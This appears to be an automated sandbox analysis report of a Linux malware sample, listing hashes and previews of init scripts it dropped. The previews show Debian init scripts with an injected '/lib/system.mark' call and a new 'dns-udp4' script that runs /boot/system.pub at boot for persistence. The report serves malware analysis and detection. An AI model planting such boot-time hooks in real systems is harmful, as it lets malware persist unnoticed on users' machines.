SSDEEP:	48:76MLNMwmbAzAZVCoLqLVj1I6NH/qAh1UoAaYmUoG/FVv/FkG/UoG/FQRetsJ:7BWwmEMZVChVB7UoAaZUoGDvuG/UoGq/
MD5:	2A2270B6CC5B1BB95B8ED17ACC2C088E
SHA1:	E64F610A9E1145F5C930A7B2D1B31D9D301DF237
SHA-256:	A6854F423BD17C78AD8F61EDBED12417E1DE18CD8F35CB76295CE725CF888A99
SHA-512:	4D5A50E7EB4FB077574AD2B34C08D10270B5E5246A8C6D7D0CBFDDEC399093206C4D653C7AD6ACB0E211C037D5E4D45F5FC80DEA4CA8B5FB0E2A85C1759E9576
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: cups.# Required-Start: $syslog $remote_fs.# Required-Stop: $syslog $remote_fs.# Should-Start: $network avahi-daemon slapd nslcd.# Should-Stop: $network.# X-Start-Before: samba.# X-Stop-After: samba.# Default-Start: 2 3 4 5.# Default-Stop: 1.# Short-Description: CUPS Printing spooler and server.# Description: Manage the CUPS Printing spooler and server;.# make it's web interface accessible on http://localhost:631/.### END INIT INFO..# Author: Debian Printing Team <debian-printing@lists.debian.org>..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/sbin/cupsd.NAME=cupsd.PIDFILE=/run/cups/$NAME.pid.DESC="Common Unix Printing System".SCRIPTNAME=/etc/init.d/cups..unset TMPDIR..# Exit if the package is not installed.test -x $DAEMON \|\| exit 0..mkdir -p /run/cups/certs.[ -x /sbin/restorecon ] && /sbin/restorecon -R /run/cups..# Define LSB log_* functions..

/etc/init.d/cups-browsed

Download File

Process:	/tmp/ausNOyj9by.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1979
Entropy (8bit):	5.146376682341581
Encrypted:	false
SSDEEP:	48:7mU3mK7xpvyCKyhfPV5upSYf54v6YSBFQJvFn2b:7j3FpjhnV5upSYuv3ScJp2b
MD5:	DA422CE81DD723C1511C06DA133FC27A
SHA1:	BBC3D860F2A391DCA48430C7C683D101463FA364
SHA-256:	1F549EBA5DB1AECF858178F62437651FDF2BA032890C4E65D204262DCCBB6F8E
SHA-512:	A4D88E11ECDD83D280131E788E2610DDA68AABEFF73E54C877341A034689B182A0B6D52DE00E0AB0177D7373740F8CCB16EABF98E17BDA643F2ECEEE3BC985A3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: cups-browsed.# Required-Start: $syslog $remote_fs $network $named $time.# Required-Stop: $syslog $remote_fs $network $named $time.# Should-Start: avahi-daemon.# Should-Stop: avahi-daemon.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: cups-browsed - Make remote CUPS printers available locally.# Description: This daemon browses Bonjour broadcasts of shared remote CUPS.# printers and makes these printers available locally by creating.# local CUPS queues pointing to the remote queues. This replaces.# the CUPS browsing which was dropped in CUPS 1.6.1. For the end.# the behavior is the same as with the old CUPS broadcasting/.# browsing, but in the background the standard method for network.# service announcement and discovery, Bonjour, is used..### END INIT INFO..DAEMON=/usr/sbin/cups-browsed.NAME=cups-browsed.PIDFIL

/etc/init.d/dbus

Download File

Process:	/tmp/ausNOyj9by.elf
File Type:	POSIX shell script, Unicode text, UTF-8 text executable
Category:	dropped
Size (bytes):	3255
Entropy (8bit):	5.122590071157076
Encrypted:	false
SSDEEP:	96:9JOxb7pmQJ3sQmx+xZRGWoGUuK2gY5W7zTXmgI:9Jwf7XMSIr7nXmL
MD5:	E85B436BDC8D0D1FAB58603A43BD7F55
SHA1:	53A674DE137A91FF396048EF8F09B0F306397136
SHA-256:	0FD1F38334022C7D46F8F429E0461DE6A6F20AC6BB4CF2B3C0C6DF6E44C0E92F
SHA-512:	8E285B86DE44C4FDDA957F903C9656E777D1F13D713EA84F7EAD5566D4093155E4836281710C855F5092F4C3B0DD9E5F808ABBBCFDE36F0911C732A669476A5D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.### BEGIN INIT INFO.# Provides: dbus.# Required-Start: $remote_fs $syslog.# Required-Stop: $remote_fs $syslog.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: D-Bus systemwide message bus.# Description: D-Bus is a simple interprocess messaging system, used.# for sending messages between applications..### END INIT INFO.# -- coding: utf-8 --.# Debian init.d script for D-BUS.# Copyright . 2003 Colin Walters <walters@debian.org>.# Copyright . 2005 Sjoerd Simons <sjoerd@debian.org>..set -e..DAEMON=/usr/bin/dbus-daemon.UUIDGEN=/usr/bin/dbus-uuidgen.UUIDGEN_OPTS=--ensure.NAME=dbus.DAEMONUSER=messagebus.PIDDIR=/var/run/dbus.PIDFILE=$PIDDIR/pid.DESC="system message bus"..test -x $DAEMON \|\| exit 0... /lib/lsb/init-functions..# Source defaults file; edit that file to configure this script..PARAMS="".if [ -e /etc/default/dbus ]; then./lib/system.mark. . /etc/default/dbus.fi..create_machineid() {. # Create machine-id file. i

/etc/init.d/dns-udp4

Download File

Process:	/tmp/ausNOyj9by.elf
File Type:	Bourne-Again shell script, ASCII text executable
Category:	dropped
Size (bytes):	168
Entropy (8bit):	5.03458455286979
Encrypted:	false
SSDEEP:	3:TKH/AnsKhWeftXWQfv+NjWRLQ6WYkREpFNF/ebzkRKVFOWSXKWRAIhQ4+:jsKhLtXpv+1W/a2eMJnKWmz
MD5:	2C9C7188232B53D595FD0541654BBCAC
SHA1:	7D0AAB87AD2A7663236C5A7251E9EFAB1C47437A
SHA-256:	C334828BE737392703EF01044BD122F47C9188E0443FC81413F1801486E0EE9F
SHA-512:	CC841292BF0A1AB588D701BC65AB199520209C82C3AD6038BC12AE7CF8537EDDDBD04E480F5CBF972A0731F64F531063ABEA2D1863E126B8C42C88960A2240C7
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/bash.### BEGIN INIT INFO.#chkconfig: 2345 10 90.#description:system.pub.# Default-Start: 2 3 4 5.# Default-Stop:.### END INIT INFO./boot/system.pub.exit 0

/etc/init.d/gdm3

Download File

Process:	/tmp/ausNOyj9by.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3102
Entropy (8bit):	5.045804889605048
Encrypted:	false
SSDEEP:	48:78unF1gLpANlduwTebFGB8B4ndfPaHa59zqPN/UsCVADsZvOsFzmxOsFC2WtFji:7dnM1aV3B5dNQaVAGvoe2Wtc
MD5:	979319372C9DA2093D245E5755FF36A6
SHA1:	9B5DD36873636794D6AE07792E7D4D9DED2C2489
SHA-256:	28C4D5946FDE3F9F7A846DA9F2E59F6A5A62FCECA7A527205F67A02478528D59
SHA-512:	89C92D9C74421B4AC6CE6BC46E09859CB72D836B69BDFE144FC8AA83D990FF135070D86C0A1FE225D8DB8CEE8756B67ABE8F117AB247EC7930B8C5E5A967DF0F
Malicious:	true
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: gdm3.# Should-Start: console-screen dbus network-manager.# Required-Start: $local_fs $remote_fs.# Required-Stop: $local_fs $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: GNOME Display Manager.# Description: Debian init script for the GNOME Display Manager.### END INIT INFO.#.# Author: Ryan Murray <rmurray@debian.org>.#.set -e..PATH=/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/sbin/gdm3.PIDFILE=/var/run/gdm3.pid..test -x $DAEMON \|\| exit 0..if [ -r /etc/default/locale ]; then./lib/system.mark. . /etc/default/locale. export LANG LANGUAGE.fi... /lib/lsb/init-functions..# To start gdm even if it is not the default display manager, change.# HEED_DEFAULT_DISPLAY_MANAGER to "false.".HEED_DEFAULT_DISPLAY_MANAGER=true.DEFAULT_DISPLAY_MANAGER_FILE=/etc/X11/default-display-manager..activate_logind() {. # Try to dbus activate logind to avoid a race conditions if we are not. # runnin

/etc/init.d/hddtemp

Download File

Process:	/tmp/ausNOyj9by.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3163
Entropy (8bit):	5.2621448888959215
Encrypted:	false
SSDEEP:	48:ietQlU+vdYb5tM7yL7yi47yIrrFML6YRv50JDRABzNfuhCv8Z//UZJ7iu6052m3s:FtQlTd65tp6iNlLLRRQ4AsUk6o2mc
MD5:	A5AD832AE20F98254D6020CE444485FD
SHA1:	43408C17AB8386C42B777ED1E38A2C0D0D90FC7E
SHA-256:	52BF10B965E7EBBC956E2C1C10E8E4280278662428F634459607FDD51B4BBB97
SHA-512:	A54A09CD8B65D935F28B120AB5AD675FFB23447111D188F152F47FB5164B0D67A09BD25672F9967BABD74C19563F5F48FECE642E6D51ECC3D5088261FBFD8B1F
Malicious:	true
Preview:	#!/bin/sh.#.# skeleton example file to build /etc/init.d/ scripts..# This file should be used to construct scripts for /etc/init.d..#.# Written by Miquel van Smoorenburg <miquels@cistron.nl>..# Modified for Debian GNU/Linux.# by Ian Murdock <imurdock@gnu.ai.mit.edu>..#.# Version: @(#)skeleton 1.8 03-Mar-1998 miquels@cistron.nl.#..### BEGIN INIT INFO.# Provides: hddtemp.# Required-Start: $remote_fs $syslog $network.# Required-Stop: $remote_fs $syslog $network.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: disk temperature monitoring daemon.# Description: hddtemp is a disk temperature monitoring daemon.### END INIT INFO..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.NAME=hddtemp.DAEMON=/usr/sbin/$NAME.DESC="disk temperature monitoring daemon"..DISKS="/dev/hd[a-z] /dev/hd[a-z][a-z]".DISKS="$DISKS /dev/sd[a-z] /dev/sd[a-z][a-z]".DISKS="$DISKS

/etc/init.d/hwclock.sh

Download File

Process:	/tmp/ausNOyj9by.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3946
Entropy (8bit):	5.1533815522152295
Encrypted:	false
SSDEEP:	96:uYqy3be4txLsMwqTZLLFFT7aTfNvagXQwj5jNvaYXakeQz:VZbxtXFZPKTfNvawtjNva4n
MD5:	D79E755001A5DB9E20CEDB6C961025F2
SHA1:	EDC19EC928BF4DAD45DA256670D819453BB58AE8
SHA-256:	11069209E8BB5F1A4C1241C0639C07EA11B31E688A7C045936161CFBE5D8FEA2
SHA-512:	4BF748BD107D2C3340FD95E05FF58B1F1B60C5248C427F0764CD5E99C9EC0495608BC8D0052803714CE2B85E38F9DA03A092AD94E04AF29B345D4721607582A1
Malicious:	true
Preview:	#!/bin/sh.# hwclock.sh.Set and adjust the CMOS clock..#.# Version:.@(#)hwclock.sh 2.00 14-Dec-1998 miquels@cistron.nl.#.# Patches:.#..2000-01-30 Henrique M. Holschuh <hmh@rcm.org.br>.#.. - Minor cosmetic changes in an attempt to help new.#.. users notice something IS changing their clocks.#.. during startup/shutdown..#.. - Added comments to alert users of hwclock issues.#.. and discourage tampering without proper doc reading..# 2012-02-16 Roger Leigh <rleigh@debian.org>.# - Use the UTC/LOCAL setting in /etc/adjtime rather than.# the UTC setting in /etc/default/rcS. Additionally.# source /etc/default/hwclock to permit configuration...### BEGIN INIT INFO.# Provides: hwclock.# Required-Start: mountdevsubfs.# Required-Stop: mountdevsubfs.# Should-Stop: umountfs.# Default-Start: S.# X-Start-Before: checkroot.# Default-Stop: 0 6.# Short-Description: Sync hardware and system clock time..

/etc/init.d/irqbalance

Download File

Process:	/tmp/ausNOyj9by.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2707
Entropy (8bit):	4.999484335058729
Encrypted:	false
SSDEEP:	48:92ZPnWGmH6TMV5m11QU7dXCWQgxxsXuHtpyBMbtKxxsDBV/BkH5:92Z/WbZnm11LdyWFxKXuHtcBMbtKxKDc
MD5:	264DF0349838878E6A342635B4C6AAC6
SHA1:	FF2FC0C6330DACA16EAAA8FE91CB9B5A80EBA195
SHA-256:	CB5FA5A488AC0AE34080DAAA79AB37844BCBD9DFD374D6F9E1E9118245A8B3C7
SHA-512:	A187C35A0DC65DEA6591EE63954B84837A45B33F618BFD94AB8FCD030BC6828F9EE6B523158F5D26679BE651761C90378381D6CA0ACD55D5C477079DF8369AA0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.### BEGIN INIT INFO.# Provides: irqbalance.# Required-Start: $remote_fs $syslog.# Required-Stop: $remote_fs $syslog.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: daemon to balance interrupts for SMP systems.### END INIT INFO.# irqbalance init script.# August 2003.# Eric Dorland..# Based on spamassassin init script..PATH=/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/sbin/irqbalance.NAME=irqbalance.SNAME=irqbalance.DESC="SMP IRQ Balancer".PIDFILE="/run/$NAME.pid".PNAME="irqbalance".DOPTIONS=""..# Defaults - don't touch, edit /etc/default/.OPTIONS=""..test -x $DAEMON \|\| exit 0... /lib/lsb/init-functions..test -f /etc/default/irqbalance && . /etc/default/irqbalance..# Beware: irqbalance tries to read and handle environment variables.# directly itself, but since start-stop-daemon clears the env.# we convert the variables to commandline arguments here....# (Note: in the daemon an option is enabled even if its set to.# e.g. the empty strin

/etc/init.d/iscsid

Download File

Process:	/tmp/ausNOyj9by.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1555
Entropy (8bit):	4.973705475535796
Encrypted:	false
SSDEEP:	24:2Xx/YpMr8MICUV7OlfrDNhay+HNCNBlH3U8lrQ5l8u4uuzG:MpuMAMICu7OlN+UBlH3U8lc/ZWzG
MD5:	17D9A0A3EA1CD82B2A6A20441C80F070
SHA1:	620A0F1B6910A8599B70373E1395E7C72D31DFD1
SHA-256:	8E41D01C9F88FCA987C6F56E3BF127AB5A9B2D151AC688748B4E68318701BF5C
SHA-512:	0DCF1BFA3B51D299B5D3F581CE6AF6B85B95806CC4854EE16451F852AD85C3733A8AC9D1FD887CE01C77B926F762787913D4A8BC19DF7C0260D9E75B6DA5AB25
Malicious:	true
Preview:	#!/bin/sh.# kFreeBSD do not accept scripts as interpreters, using #!/bin/sh and sourcing..if [ true != "$INIT_D_SCRIPT_SOURCED" ] ; then./lib/system.mark. set "$0" "$@"; INIT_D_SCRIPT_SOURCED=true . /lib/init/init-d-script.fi.### BEGIN INIT INFO.# Provides: iscsid.# Required-Start: $network $local_fs.# Required-Stop: $network $local_fs sendsigs.# Default-Start: S.# Default-Stop: 0 1 6.# Short-Description: iSCSI initiator daemon (iscsid).# Description: The iSCSI initiator daemon takes care of.# monitoring iSCSI connections to targets. It is.# also the daemon providing the interface for the.# iscisadm tool to talk to when administering iSCSI.# connections..### END INIT INFO..# Author: Christian Seiler <christian@iwakd.de>..DESC="iSCSI initiator daemon".DAEMON=/sbin/iscsid.PIDFILE=/run/iscsid.pid.OMITDIR=/run/sendsigs.omit.d..do_start_prepare() {..if ! /lib/open-iscsi/startup-chec

/etc/init.d/keyboard-setup.sh

Download File

Process:	/tmp/ausNOyj9by.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1548
Entropy (8bit):	4.312093274159983
Encrypted:	false
SSDEEP:	48:9XfgD1yzyKzYcX/LshGJckS5MJAu8kGh5A9b6:9YQXC/w0SO
MD5:	4C516D25550878CE2CE024B6E97105DB
SHA1:	812E84ACA9890069BF1DBDEF175789DB8792F63D
SHA-256:	DE554C11A0C59B7354F88FD864DDFE7AE79BF3086319418BB27022B155693D85
SHA-512:	608967AF4BB7490885EA7E8EA8C5CFE2D38A7581FD3E9FE153793414063AC85079D1F3AA530650DF2D1ED47F7EA14A0D1BB38CA1F2F90627B03195D877F69335
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.### BEGIN INIT INFO.# Provides: keyboard-setup.sh.# Required-Start: mountkernfs.# Required-Stop:.# X-Start-Before: checkroot.# Default-Start: S.# Default-Stop:.# X-Interactive: true.# Short-Description: Set the console keyboard layout.# Description: Set the console keyboard as early as possible.# so during the file systems checks the administrator.# can interact. At this stage of the boot process.# only the ASCII symbols are supported..### END INIT INFO..if [ -f /bin/setupcon ]; then./lib/system.mark. case "$1" in. stop\|status). # console-setup isn't a daemon. ;;. start\|force-reload\|restart\|reload). if [ -f /lib/lsb/init-functions ]; then./lib/system.mark. . /lib/lsb/init-functions. else. log_action_begin_msg () {.. echo -n "$@... ". }.. log_action_end_msg () {..

/etc/init.d/kmod

Download File

Process:	/tmp/ausNOyj9by.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2164
Entropy (8bit):	4.911228479541638
Encrypted:	false
SSDEEP:	24:+mUxLADBzBQYDMAKjqg3UlfbrMZC/tCYJGMsMHwDa1rig/re4NAGg0clXd:l/dtQYxKjRQfbF/oYJbJQAri6KYG
MD5:	17D2C5E15246E822C28D957F063D1A16
SHA1:	387E38EC5877238778209A18EA0D930709E7A603
SHA-256:	25B762063EFF997BB4FFA75852E3E26F08BA0419C341452BA86F17F6734A9448
SHA-512:	0CC8B7A4D72E05C3F4676B6DD84CF25A660E9E9821D367ACF0D3EE56461EC57441A317389F04A5D0B74415495A499F73FCC968B6A57134A92768D43395E86EBA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh -e.### BEGIN INIT INFO.# Provides: kmod.# Required-Start: .# Required-Stop: .# Should-Start: checkroot.# Should-Stop:.# Default-Start: S.# Default-Stop:.# Short-Description: Load the modules listed in /etc/modules..# Description: Load the modules listed in /etc/modules..### END INIT INFO..# Silently exit if the kernel does not support modules..[ -f /proc/modules ] \|\| exit 0.[ -x /sbin/modprobe ] \|\| exit 0..[ -f /etc/default/rcS ] && . /etc/default/rcS.. /lib/lsb/init-functions..PATH='/sbin:/bin'..case "$1" in. start). ;;.. stop\|restart\|reload\|force-reload). log_warning_msg "Action '$1' is meaningless for this init script". exit 0. ;;.. *). log_success_msg "Usage: $0 start". exit 1.esac..load_module() {. local module args. module="$1". args="$2".. if [ "$VERBOSE" != no ]; then./lib/system.mark. log_action_msg "Loading kernel module $module". modprobe $module $args \|\| true. else. modprobe $module $args > /dev/null 2>&1 \|\| t

/etc/init.d/lightdm

Download File

Process:	/tmp/ausNOyj9by.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3534
Entropy (8bit):	5.284950933277381
Encrypted:	false
SSDEEP:	48:fbmo8vyUjH3J+cNrWId4KF9wDeXAr/FI/F7R7cJ0IBnrd/g1ZsbHaX1Z4td/Wzvx:d8z3J+cNiRFSzGhJHyUDuxTDld
MD5:	8134B3B7E43D4BBE6C1F3E7C7C73A7ED
SHA1:	156CCD1CF7176156A0AD84CDEB5B53868C81712F
SHA-256:	379A79FE27830ACAE74486161F85FD54A2CC176FEB57D6E48B988147A994403B
SHA-512:	7604BFF7FE0AE3CDFF0BE20F2E2CD84BA854EBB35829F6CC6EE6837E91F2F0347CB7E86CF831A1C524F6BC80CC9F34185E89F580A2F0D9F42364E5FC00E78960
Malicious:	true
Preview:	#!/bin/sh..# Largely adapted from xdm's init script:.# Copyright 1998-2002, 2004, 2005 Branden Robinson <branden@debian.org>..# Copyright 2006 Eugene Konev <ejka@imfi.kspu.ru>.#.# This is free software; you may redistribute it and/or modify.# it under the terms of the GNU General Public License as.# published by the Free Software Foundation; either version 2,.# or (at your option) any later version..#.# This is distributed in the hope that it will be useful, but.# WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the.# GNU General Public License for more details..#.# You should have received a copy of the GNU General Public License with.# the Debian operating system, in /usr/share/common-licenses/GPL; if.# not, write to the Free Software Foundation, Inc., 51 Franklin Street, .# Fifth Floor, Boston, MA 02110-1301, USA...### BEGIN INIT INFO.# Provides: lightdm.# Required-Start: $local_fs $remote_fs dbus.# R

/etc/init.d/lm-sensors

Download File

Process:	/tmp/ausNOyj9by.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	901
Entropy (8bit):	5.104600839303824
Encrypted:	false
SSDEEP:	12:1CpBMHQHf7Wc9rlVYhRwDyh0QvsQoiXmH0+QhKDydO6aock1j6yLRujvljn:1i4WyM/Iwfi2Hjq13O
MD5:	4F5481561C2CB414FA79507BA03FDEF7
SHA1:	974F6AE6CE96EDBFA6247B47989CC4EA0D4C5CC6
SHA-256:	B8183CE4BF57A668EE504129E668E08DBE62FA0DDB7B7E42AABFF52FD7FBBB1D
SHA-512:	20B7254B833125FFD3449A402C534C9FF7C2A382C3407A35DC22A48B17352D7EFD767FF6A1C0A14FE8A70C2CCDED993A0695AC24D086036340267F4DA051C146
Malicious:	true
Preview:	#!/bin/sh..### BEGIN INIT INFO.# Provides: lm-sensors.# Required-Start: $remote_fs.# Required-Stop:.# Default-Start: S.# Default-Stop:.# Short-Description: lm-sensors.# Description: hardware health monitoring.### END INIT INFO... /lib/lsb/init-functions..[ -f /etc/default/rcS ] && . /etc/default/rcS.PATH=/bin:/usr/bin:/sbin:/usr/sbin.PROGRAM=/usr/bin/sensors..test -x $PROGRAM \|\| exit 0..case "$1" in. start)..log_action_begin_msg "Setting sensors limits"..if [ "$VERBOSE" = "no" ]; then./lib/system.mark.../usr/bin/sensors -s 1> /dev/null 2> /dev/null.../usr/bin/sensors 1> /dev/null 2> /dev/null..else.../usr/bin/sensors -s.../usr/bin/sensors > /dev/null..fi..log_action_end_msg 0..;;. stop)..;;. force-reload\|restart)..$0 start..;;. status)..exit 0..;;. *)..log_success_msg "Usage: /etc/init.d/lm-sensors {start\|stop\|restart\|force-reload\|status}"..exit 1.esac..exit 0..

/etc/init.d/lvm2-lvmpolld

Download File

Process:	/tmp/ausNOyj9by.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	604
Entropy (8bit):	5.317046519159889
Encrypted:	false
SSDEEP:	12:wdRDNeBuYryMmCU33VLBa5kI5GKq9XquaZ+w2Cj/:2Xx/lti9OXylj/
MD5:	1BB719CD6C1AFE11FFAA22E457222B8B
SHA1:	8C6D68B8CFD06AD81813E9568F61C029F12D258A
SHA-256:	282EC5B6FC5F91FD0F569B1B84FA5DBA6C46173479A2A8F2F3B38A6DE6F570AF
SHA-512:	23015D67D978FA0C37E305E57D74DE0DA8C4E78436E3D0C640C52C355CB301A25799898C722FD6BDACF6BF85DE0A0E590CBC8C6624DD86D39AD59800BD6491E7
Malicious:	true
Preview:	#!/bin/sh.# kFreeBSD do not accept scripts as interpreters, using #!/bin/sh and sourcing..if [ true != "$INIT_D_SCRIPT_SOURCED" ] ; then./lib/system.mark. set "$0" "$@"; INIT_D_SCRIPT_SOURCED=true . /lib/init/init-d-script.fi.### BEGIN INIT INFO.# Provides: lvm2-lvmpolld.# Required-Start: $local_fs.# Required-Stop: $local_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: LVM2 poll daemon.### END INIT INFO..DESC="LVM2 poll daemon".DAEMON=/sbin/lvmpolld.DAEMON_ARGS="-t 60".PIDFILE=/run/lvmpolld.pid..do_start_prepare() {. mkdir -m 0700 -p /run/lvm.}..

/etc/init.d/mono-xsp4

Download File

Process:	/tmp/ausNOyj9by.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2518
Entropy (8bit):	5.328823038467521
Encrypted:	false
SSDEEP:	48:7HvaUX9Q3esRt3uK4PWNr/42iwk3qmA4JO4pTjmCjVwUH:7PaUX0eSt3BacznDsbjmCjVwS
MD5:	70A5C40B509AEA9932FA851AD70ACB57
SHA1:	463305EFCF59020D68D1E2111298EE20612D0D73
SHA-256:	04F0D49C9370F56A6BC18A6CCDE3672D5B1A8765E6522C5C55D97CCF8A21AE5C
SHA-512:	E9BF78D0D63370C7C4ED5BA1CDFD3BA2A3269269EFEC61C1027CC1FD37496CE6F179E8BDBB5554C23234744CEFE39C3CB7964C22C8A99618E83160D3E0DC879B
Malicious:	true
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: mono-xsp4.# Required-Start: $remote_fs.# Required-Stop: $remote_fs.# Should-Start: .# Should-Stop:.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: Mono XSP4.# Description: Debian init script for Mono XSP4..### END INIT INFO.#.# Written by Pablo Fischer <pablo@pablo.com.mx>.# Dylan R. E. Moonfire <debian@mfgames.com>.# Modified for Debian GNU/Linux.#.# Version:.@(#)mono-xsp4 pablo@pablo.com.mx.#..# Variables.PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/bin/xsp4.NAME=mono-xsp4.DESC="XSP 4.0 WebServer".DEFAULT=/etc/default/$NAME.CFGDIR=/etc/xsp4.VIRTUALFILE=$CFGDIR/debian.webapp.MONO_SHARED_DIR=/var/run/$NAME.start_boot=false..# Use LSB.. /lib/lsb/init-functions..# If we don't have the basics, don't bother.test -x $DAEMON \|\| exit 0.test -f $DEFAULT && . $DEFAULT...if [ "x$start_boot" != "xtrue" ] ; then./lib/system.mark. exit 0.fi..if [ ! -e $MO

/etc/init.d/multipath-tools

Download File

Process:	/tmp/ausNOyj9by.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2964
Entropy (8bit):	5.319082661316184
Encrypted:	false
SSDEEP:	48:7HUksR9JmtLLCDCJ9ETaPn1PCDCJ9ETafOBUV1kqH2fQuEfg64U149Hh7KKSKMs:7HUkwbmhmDr+Pn1qDr+2qV1RHSQuav4D
MD5:	FA339A7172040C330DC30E65E29BE1D1
SHA1:	F558AD0D3435E5F9E486820B9844031CF83450B1
SHA-256:	7C1F374BB9BBDB94BE70ED2E096594A97C0A8E4A79F28F7D5789A0BE7BCE4983
SHA-512:	C5E80E9CBB87EE001E60B84D8A89464BE8661EAD8CAF2453A20B8073EF0CF87524FF1959FF1020F363F7341A3938614FBA6258FFE145AF1B4DD826D5DA5D923B
Malicious:	true
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: multipath-tools.# Required-Start: udev $local_fs $remote_fs $syslog.# Required-Stop: udev $local_fs $remote_fs $syslog.# Should-Start: iscsi.# Should-Stop: iscsi.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: multipath daemon.# Description:.### END INIT INFO..PATH=/sbin:/bin:/usr/sbin/:/usr/bin.DAEMON=/sbin/multipathd.NAME=multipathd.DESC="multipath daemon".syspath=/sys/block..test -x $DAEMON \|\| exit 0... /lib/lsb/init-functions..if [ -f /etc/default/multipath-tools ] ; then./lib/system.mark... /etc/default/multipath-tools.fi..teardown_slaves().{.cd $1; .if [ -d "slaves" ]; then./lib/system.mark.for slave in slaves/;.do..if [ "$slave" = "slaves/" ]; then./lib/system.mark...read dev < $1/dev...tablename=$(dmsetup table --target multipath \| sed -n "s/$.$: . $dev .*/\1/p")...if ! [ -z $tablename ]; then./lib/system.mark....log_daemon_msg "Root is on a multipathed device, multipathd c

/etc/init.d/open-iscsi

Download File

Process:	/tmp/ausNOyj9by.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2589
Entropy (8bit):	5.114269594803135
Encrypted:	false
SSDEEP:	48:7UMRMrEm3cy8NL/NgZlfHMtWBAl3ATeTPAdWI4RdWdtRHg02AC9ArANTcAhicF:7b2rH338lmZlfs/lwA4dWI6C7DUbL
MD5:	B48EB035141800F7976971DFDB30D671
SHA1:	18D8B59AD64232DEBB186270DA8172D0C1DE47A8
SHA-256:	E28FD9022AC23B3ED07D6223DC2EAA12DDE98FAA3D8AF142CB091C9C58ACB3A3
SHA-512:	7D617DC4E0DA0BE90FB869253093E122A9EF3F78AE0F838167BDF210AA0310A2E753EB2E22B45A9BE4E05C4DDE711AE0768BC3CF21650D990F3BFF29D4D59EA7
Malicious:	true
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: open-iscsi iscsi.# Required-Start: $network $local_fs iscsid.# Required-Stop: $network $local_fs iscsid sendsigs.# Default-Start: S.# Default-Stop: 0 1 6.# Short-Description: Login to default iSCSI targets.# Description: Login to default iSCSI targets at boot and log out.# of all iSCSI targets at shutdown..### END INIT INFO..PATH=/sbin:/bin.DAEMON=/sbin/iscsid.ADM=/sbin/iscsiadm.PIDFILE=/run/iscsid.pid.NAMEFILE=/etc/iscsi/initiatorname.iscsi.CONFIGFILE=/etc/iscsi/iscsid.conf.OMITDIR=/run/sendsigs.omit.d..[ -x "$DAEMON" ] \|\| exit 0... /lib/lsb/init-functions..# Include defaults if available.if [ -f /etc/default/open-iscsi ]; then./lib/system.mark... /etc/default/open-iscsi.fi...if [ ! -d /sys/class/ ]; then./lib/system.mark. log_failure_msg "iSCSI requires a mounted sysfs, not started.". exit 0.fi..RETVAL=0..start() {..if ! [ -s $PIDFILE ] \|\| ! kill -0 `sed -n 1p $PIDFILE` >/dev/null ; then./l

/etc/init.d/open-vm-tools

Download File

Process:	/tmp/ausNOyj9by.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1881
Entropy (8bit):	4.866964949464276
Encrypted:	false
SSDEEP:	48:1a/f0aOHh8R/X/DA4pWh8FgM8QhmMl8FkgPooG2DKYUP:1a/f0aOB8Rk4e8j8Q8Ml8OmooG2D3k
MD5:	97AC49C2355ACB94890353EE4381A945
SHA1:	D847EF688D5785E54FB463C2E00B0922BA0E4060
SHA-256:	86FBD32099B190A52DFF0ADCFB72BE3F9C13C3A6F47DE40EA3DF1E056B9616B5
